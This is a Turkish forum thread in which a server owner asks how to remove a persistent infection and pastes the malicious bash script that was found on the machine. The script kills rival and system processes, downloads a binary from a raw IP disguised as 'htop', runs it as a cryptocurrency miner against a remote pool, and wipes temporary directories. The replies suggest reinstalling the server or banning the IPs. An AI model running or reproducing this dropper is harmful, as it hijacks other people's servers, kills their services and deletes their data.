• 06-03-2023, 13:28:27
    #1
    Beni bu virüsten kurtacak olan biri var mı?

    Whatsapp: 0-43 592 206sıfır





    ms.neoogilvy'den indirdiği ve çalıştırdığı dosya
    #!/bin/bash
    ps aux | grep -v grep | grep 'tmp' | awk '{print $2}' | xargs -i kill -9 {}
    ps aux | grep -v grep | grep 'var' | awk '{print $2}' | xargs -i kill -9 {}
    ps aux | grep -v grep | grep 'cron' | awk '{print $2}' | xargs -i kill -9 {}
    ps aux | grep -v grep | grep 'zergpool.com' | awk '{print $2}' | xargs -i kill -9 {}
    ps aux | grep -v grep | grep 'pool' | awk '{print $2}' | xargs -i kill -9 {}
    ps aux | grep -v grep | grep 'stratum' | awk '{print $2}' | xargs -i kill -9 {}
    ps aux | grep -v grep | grep 'mysqld' | awk '{print $2}' | xargs -i kill -9 {}
    kill $(pgrep log-rotate)
    kill $(pgrep kdevtmp)
    kill $(pgrep kinsing)
    curl --insecure https://51.178.183.72/avx.gif -o /tmp/htop || wget --no-check-certificate https://51.178.183.72/avx.gif -O /tmp/htop
    cd /tmp
    chmod 777 /tmp/htop
    ./htop -a yescryptR16 -o 198.50.168.213:6333 -u qpkg4fgnh8a0hhzd2z9g80g4d09j6qnt0sth6l8x7z -p c=BCH --cpu-affinity 0x3 --cpu-priority 5 --background >/dev/null &
    sleep 1
    rm /tmp/*
    rm /var/tmp/*
    Nasıl yayılıyor tespit edemedim. Crondan temizliyorum. Sunucuyu yeniden başlattığımda yeniden çalışmaya başlıyor ve zaman geçtikte çoğalıyor.
  • 06-03-2023, 13:29:24
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    sıfırlayabilirsiniz bilgisayarı
  • 06-03-2023, 13:30:20
    #3
    SniperMask adlı üyeden alıntı: mesajı görüntüle
    sıfırlayabilirsiniz bilgisayarı
    Digital ocean yeni image yükleyecek fakat docker volume, dosyalar vs. derken epey zahmetli olacak. Temizleme işlemi uygun olursa tercih ederim. En kötü ihtimal sıfırlayacak sunucuyu
  • 08-04-2023, 22:14:49
    #4
    denemek için oradaki ip adreslerini banla. tavsiyem zarar verirmi bilemem fakat en kolay yolu . banlayınca sunucuyu göçeririm derse ben karışmam